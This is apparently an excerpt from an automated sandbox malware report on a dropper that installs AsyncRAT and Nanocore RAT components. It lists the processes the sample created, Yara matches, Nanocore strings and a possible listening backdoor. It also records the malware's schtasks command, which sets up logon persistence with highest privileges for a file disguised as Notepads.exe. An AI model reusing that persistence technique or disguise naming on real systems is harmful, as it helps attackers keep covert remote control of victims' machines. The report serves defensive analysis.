Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ame.exe	Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: fi.exe, 00000004.00000003.454678808.00000000008D7000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: fi.exe, 00000004.00000003.570431620.00000000008C1000.00000004.00000001.sdmp	Binary or memory string: Program Manager*
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: fi.exe, 00000004.00000002.595277420.0000000000D90000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.594919151.0000000001D20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: fi.exe, 00000004.00000003.366597291.00000000008D7000.00000004.00000001.sdmp	Binary or memory string: Program Manager|
Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmp	Binary or memory string: =rProgram Manager

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\ame.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ame.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Notepads.exe	Queries volume information: C:\Users\user\AppData\Roaming\Notepads.exe VolumeInformation

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
Source: Yara match	File source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Source: wscript.exe, 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fi.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: fi.exe, 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe.4.dr	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_023428EA bind,		4_2_023428EA
Source: C:\Users\user\AppData\Local\Temp\fi.exe	Code function: 4_2_023428A9 bind,		4_2_023428A9